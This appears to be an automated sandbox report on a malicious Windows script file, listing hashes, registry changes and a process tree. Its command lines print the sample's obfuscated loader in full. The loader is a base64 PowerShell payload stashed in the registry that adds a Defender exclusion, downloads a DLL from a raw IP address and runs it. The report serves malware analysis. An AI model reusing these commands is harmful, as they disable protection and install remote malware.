21a73a39348f4021cd6af58996a821c9ffd0dc2f84a49ca9d2b754f2f504f950

Analysis

max time kernel
112s
max time network
151s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
02/03/2023, 18:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

O P E N .wsf
Size

316KB
MD5

ac4385ffc9f0f005bd194486aed5c24f
SHA1

161cdb625a9d8716ed61e16ce83136ee57d42753
SHA256

21a73a39348f4021cd6af58996a821c9ffd0dc2f84a49ca9d2b754f2f504f950
SHA512

262c953e0ccf1f9cc61ee36859b2fa9fb89d1debb33faa25168cd240096960b6f44513c8731ac92e81cf6f8e36680e666d3222f6ad0d2355640dafea1ef604b3
SSDEEP

6144:lisXZjbwYByTQwxaexOQvqCu3eapoycGFyEJbel2ZJ5jBCPbJe5rJDp/RtZl80CM:limGpZP5fLycSVJilO10JedZx71sLgKQ

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{89DEBA21-B932-11ED-B2AF-D28FF4BEF639} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000dbb59ddc676e394a83d3f942d26f43ca000000000200000000001066000000010000200000004d0b9aaf43246363f19e043ab0d264e7b3f2c9147c8c28795b406560fc46cdf8000000000e8000000002000020000000f55cf5d773137883c312896667d7cd12ad7324a8ccfea71f6459721ed2532aec900000002370781b127bffd7098472533e887195614639f403b7a9ca7d1f6837d9c9374d851272b52d1239b995a04f6003ccbbe2dfb1ca5a05555f1c3a395e6af13a19a924f1239f20091572a4b3f8a2d3c487a27ee5f64e497c8a13296b3d8ab2fa63a1ad139d3eadb43615eee7c2faf223f2c11f35488c48f72bbd27a355ca58bbde99a8fb883a1661665b958e08fd1e8108ec400000009f1405d56c8da15c3397a66b677e1a5c67d0105ec5d36a49808b8bb45406f3f8650375675626751f47721ef94354df325934be7a1ee74079a3a7221446218092	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0e2c7643f4dd901	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "384551198"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000dbb59ddc676e394a83d3f942d26f43ca000000000200000000001066000000010000200000007ff5429f9c725ea9a26ec10584a0a5f4f3e2d3f0a88b58a96ebc02f68872a3e7000000000e800000000200002000000074fef4916c0882884860594d6edd951584573b36093652de351029a83394edea20000000cac0f22397ff82b03566a98850dbff5211103482a81a0dad324c473c3bdd3c6040000000a3f85fa024b1354f50e9d27d233d5bf6e3afa351c5ac21d1beb4c193ee6530d6fe956851434aa51e7083c9e5260b8bdea62dd4ab233f274537d3fd4a32a45ef8	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
1652	reg.exe
1668	reg.exe
308	reg.exe
1892	reg.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1720	powershell.exe
1104	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1592	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1592	iexplore.exe
1592	iexplore.exe
944	IEXPLORE.EXE
944	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 1756 wrote to memory of 1652	1756	WScript.exe	28
PID 1756 wrote to memory of 1652	1756	WScript.exe	28
PID 1756 wrote to memory of 1652	1756	WScript.exe	28
PID 1756 wrote to memory of 1668	1756	WScript.exe	29
PID 1756 wrote to memory of 1668	1756	WScript.exe	29
PID 1756 wrote to memory of 1668	1756	WScript.exe	29
PID 1756 wrote to memory of 308	1756	WScript.exe	32
PID 1756 wrote to memory of 308	1756	WScript.exe	32
PID 1756 wrote to memory of 308	1756	WScript.exe	32
PID 1756 wrote to memory of 1892	1756	WScript.exe	34
PID 1756 wrote to memory of 1892	1756	WScript.exe	34
PID 1756 wrote to memory of 1892	1756	WScript.exe	34
PID 1756 wrote to memory of 1720	1756	WScript.exe	36
PID 1756 wrote to memory of 1720	1756	WScript.exe	36
PID 1756 wrote to memory of 1720	1756	WScript.exe	36
PID 1756 wrote to memory of 1820	1756	WScript.exe	38
PID 1756 wrote to memory of 1820	1756	WScript.exe	38
PID 1756 wrote to memory of 1820	1756	WScript.exe	38
PID 1820 wrote to memory of 1592	1820	cmd.exe	40
PID 1820 wrote to memory of 1592	1820	cmd.exe	40
PID 1820 wrote to memory of 1592	1820	cmd.exe	40
PID 1720 wrote to memory of 1104	1720	powershell.exe	41
PID 1720 wrote to memory of 1104	1720	powershell.exe	41
PID 1720 wrote to memory of 1104	1720	powershell.exe	41
PID 1592 wrote to memory of 944	1592	iexplore.exe	43
PID 1592 wrote to memory of 944	1592	iexplore.exe	43
PID 1592 wrote to memory of 944	1592	iexplore.exe	43
PID 1592 wrote to memory of 944	1592	iexplore.exe	43
PID 1104 wrote to memory of 316	1104	powershell.exe	45
PID 1104 wrote to memory of 316	1104	powershell.exe	45
PID 1104 wrote to memory of 316	1104	powershell.exe	45

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\O P E N .wsf"
1⤵
- Suspicious use of WriteProcessMemory
PID:1756
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SubdisciplinesIterate /v leonines /d fIFGBZMCAGAIZfqUtfUBuoLbHdIYINAZYdqmXHKZzFEbqwtWTdulJLqAyOyfzkYtUMueiqwrhMbOQtzXnmjgRPbqLKAYWvixgoeCMThoxyUxxquRkekInTegvSMykafYAkYtzDYzeikcrNGRlBPSKUulrBzHwhQNjCgUDlGLPpPAtcbbGnsyIVyMoXUNeoICUOGwilCspcBCKQliTzBeRPTzFYJYqnSTpouvaJzAcOyJqCkrHLPYVHkhrPrvlSEvsoyNSbkrTYhaPCbqhbWcWlpkMfBnNFWyOMWJzRLZknmue
  2⤵
  - Modifies registry key
  PID:1652
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SubdisciplinesIterate /v PretransportHielaman /d vjNrXWINnmRsIaewNCvuRbGAJnkdHQsC
  2⤵
  - Modifies registry key
  PID:1668
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\cadencyCloches /v Moustoc /d UAcgBkAGEAeQAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFMAdQBiAGQAaQBzAGMAaQBwAGwAaQBuAGUAcwBJAHQAZQByAGEAdABlACAAfAAgACUAewAkAF8ALgBNAG8AdQBzAHQAbwBjAH0AOwAgACQAeQBlAHMAdABlAHIAZABhAHkAIAA9ACAAIgBUAG8AcgByAGUAbgB0ACIAIAArACAAJAB5AGUAcwB0AGUAcgBkAGEAeQA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAeQBlAHMAdABlAHIAZABhAHkAKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABTAHUAYgBkAGkAcwBjAGkAcABsAGkAbgBlAHMASQB0AGUAcgBhAHQAZQAgAC8AdgAgAE0AbwB1AHMAdABvAGMAIAAvAGYAIgAiACIAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQA0ADMALgAyADQANAAuADEANAA3AC4AMQA3ADUALwAzAHIANwB3AC8AMAAyADAAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAG4AbwBuAHQAcgBhAG4AcwBpAGUAbgB0AGwAeQBVAG4AbwByAGEAdABvAHIAaQBhAGwALgBkAGwAbAA7ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAG4AbwBuAHQAcgBhAG4AcwBpAGUAbgB0AGwAeQBVAG4AbwByAGEAdABvAHIAaQBhAGwALgBkAGwAbAAsAFIAUwAzADIAOwA=
  2⤵
  - Modifies registry key
  PID:308
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\cadencyCloches /v transmissions /d ffAqiCaDuIUzJHJWqdoBgAeEnGTgQCLymbRtJjObZbiOFpqGjzxJxBlSuKZpUIQUNaDBMtCFoCvkIXNNXzMTdDMrwKegRchEmuJozYejTeZEatjPGsOfZeoVprGVIKzAoLgoxOujhWZSw
  2⤵
  - Modifies registry key
  PID:1892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cadencyCloches = Get-ItemProperty -Path HKCU:\SOFTWARE\cadencyCloches | %{$_.Moustoc}; powershell -windowstyle Minimized -encodedcommand "JAB5AGUAcwB0AG$cadencyCloches"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JAB5AGUAcwB0AGUAcgBkAGEAeQAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFMAdQBiAGQAaQBzAGMAaQBwAGwAaQBuAGUAcwBJAHQAZQByAGEAdABlACAAfAAgACUAewAkAF8ALgBNAG8AdQBzAHQAbwBjAH0AOwAgACQAeQBlAHMAdABlAHIAZABhAHkAIAA9ACAAIgBUAG8AcgByAGUAbgB0ACIAIAArACAAJAB5AGUAcwB0AGUAcgBkAGEAeQA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAeQBlAHMAdABlAHIAZABhAHkAKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABTAHUAYgBkAGkAcwBjAGkAcABsAGkAbgBlAHMASQB0AGUAcgBhAHQAZQAgAC8AdgAgAE0AbwB1AHMAdABvAGMAIAAvAGYAIgAiACIAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQA0ADMALgAyADQANAAuADEANAA3AC4AMQA3ADUALwAzAHIANwB3AC8AMAAyADAAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAG4AbwBuAHQAcgBhAG4AcwBpAGUAbgB0AGwAeQBVAG4AbwByAGEAdABvAHIAaQBhAGwALgBkAGwAbAA7ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAG4AbwBuAHQAcgBhAG4AcwBpAGUAbgB0AGwAeQBVAG4AbwByAGEAdABvAHIAaQBhAGwALgBkAGwAbAAsAFIAUwAzADIAOwA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1104
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\nontransientlyUnoratorial.dll RS32
      4⤵
      PID:316
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start https://support.microsoft.com/office/troubleshoot-errors-in-onenote-for-windows-10-942b006c-46ac-4300-a629-7fac5ae4dc70
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1820
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://support.microsoft.com/office/troubleshoot-errors-in-onenote-for-windows-10-942b006c-46ac-4300-a629-7fac5ae4dc70
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1592
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1592 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:944

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
61KB

MD5
e71c8443ae0bc2e282c73faead0a6dd3

SHA1
0c110c1b01e68edfacaeae64781a37b1995fa94b

SHA256
95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

SHA512
b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
80c7236388c3360703bdaac6d5599e56

SHA1
9c282a76870af7df398d7ea3e79155c208b182a0

SHA256
073ed6c4369db32dbdf56901f13b16639bb1f2adc964ae17fecddf398f129ecb

SHA512
8aca6367d668480fe7bb548cd3e18b9f896da5dd92bd81495916fb95a455f4ba4ec60aa35a579307a97c58de20f604c7cebc3ddcc30a5cb7d17035bdf1be7e81

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
33b93ba695d59bed75a3acf5fa161d6d

SHA1
a0052d50632daf82d1a69c1b8e59504fddc28a4a

SHA256
96342aa940bb102e2b47d28f62e5c0d62f85d71833e602508862976138d5f0e1

SHA512
70c845331dd53dafcb6b8819d116fb76a1fc7667a08897d64e704cb8eea858533e4cf3c9c823fff34738f8c1eea42515da276186d6467d2cf25686114ec3e8c5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
228ef3f595ac663a9c2fbf668d6f80d1

SHA1
01e6ffbdeb871153fa000ab0fe75f9ad516c539d

SHA256
ea236cceccfac0b88950c008e8218f4c3d3a7a292e3f4328cc0ac017a5e59e6d

SHA512
1650c1b0c2266361e275a4c4c01516ef7bb2716c8c495a2ca1b75f7e8c9044db09ad0920a254b06620b9385519a8228d408aabe003094f8dab48d5d111bb3654

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bac8c39f3d239a8be453e762dabda1e7

SHA1
79d0eb201b61e9e023ea5186a44bdaab74db07a2

SHA256
8b7682845a28f39d73f1c8fc2cd1b2a5d1c036513eb57d48dd0b8dd565e0f5a0

SHA512
12f09a06b63907001b9057e09e186c10417abe7a25451e20661b0b8d142549780f01d75d22e66124b41bdcffad64e7c056c607c7a60c5180dadeb2433a6984d5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
784cba7c592cf00b5d5f1ec1662b98d7

SHA1
2dfc93e063ac8c5f94e6539d911f7b4be4d62f0f

SHA256
a771aeba0b1b3c15e35f503cbfedf2d5b48ccc0c8a2a29cbb6df854f12b21d5b

SHA512
8e40ae201c06c94505ffdbbc09d3b1c281b5eb8b47125673485022c3135f1dc7f04240874f0aa96bbb01a626a21d4b3a6b4d0c4e133e393abe6dcd7ff356f976

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
85980a3f62efecc8cce33ce8027e0562

SHA1
316fa53122fd99e57821516206da6962c496c311

SHA256
a3534dd254f028e40bcd1279655998d5a072389bd55f41599919c9cff9289bba

SHA512
0d2228364237d79be621fa3f1efd683ae0e09b5219e660643911ff7695dd9af31cb6227988f5309aa68df6ccc1393ca51875730198b5b5bf77927951cca423c3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
19619c19b10a994aef9e27a766d00c14

SHA1
f8c2695a3b0f8bc35dc09359af5c0d60c3cf97df

SHA256
af1637ca860a16bdc9f21b58b46d118dc425c8e521fee28822669b39e37488ef

SHA512
f2ffae4f69a0b8536b11322a936d7d343eb286fa3c6acfc0f2b2f2cc17ad82a19e8e940a361e79e493705c39915a84cc5e1f7b0cf7021996163d13c6e60c6b3b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2605b4c91b8c921b732280f4e87bdb5c

SHA1
2dd32c69297c0c54975f2adafdaafbe3c956a367

SHA256
56003eefbcc5e28fb3f023a7f81c86bfc778517fb05cd3860abe92413588d7aa

SHA512
4ac0ae3619dccf215cff5aebc38a3c0376aab50bf44a315aed84f8b9b5b6d4ca1991670640fa33e79f514e13c5ad75097bac9fa23efb896f5578462f889d36ce

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7656cfffd5ffdbedaba77947917a58b6

SHA1
e289ad7447e397b28704d40788e4f249a03f7f13

SHA256
bc23bc5bf61b8784b9f98cfecd04a758fd40730c2793a563ada4453ceddf0d5c

SHA512
8718f8e34ee8453ce5f5c5afe0db3ba940466366cbcce95985d31480b147d9d7cae8f1370286e6664140421177ae5b8052ea2fbbc536bdf68da0aa7207bbe35c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
347c1fb745ac7eaaab4f39eb6e57b4bc

SHA1
dd396ad50639ce7e48567b4880a0e0030e0f7d1d

SHA256
dabe9b4835c4558acafee3d427f82f33416c0e4e0c37a2ac2bb5b5c15f502f87

SHA512
9212969b2c243f761c3fcc16c80ddad8f00d7aa225bf22a70cb9b9344f8d461caf9a1451a0e47ebaf9bdcff50b3a7516165cb4c4114054c360182d29ac8305f8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0a973298d7ae40d0e8657019ca285cb8

SHA1
17b715a20d81be7713ac4b5baafff01bbaa95370

SHA256
174182feb2f09a04b79f17f8e8bb03d469f2c39591b6b65c5948e94299edaacb

SHA512
64d46a46fc80b3178503d8e51ae8e38a749f851a9ee58cef4490c2adabef0d03fbcdf29cbfe8e4060b0c660bcd54ddbf476eb96226c88429ba5ed4d1b917013d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S7FIT0B8\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab980E.tmp

Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

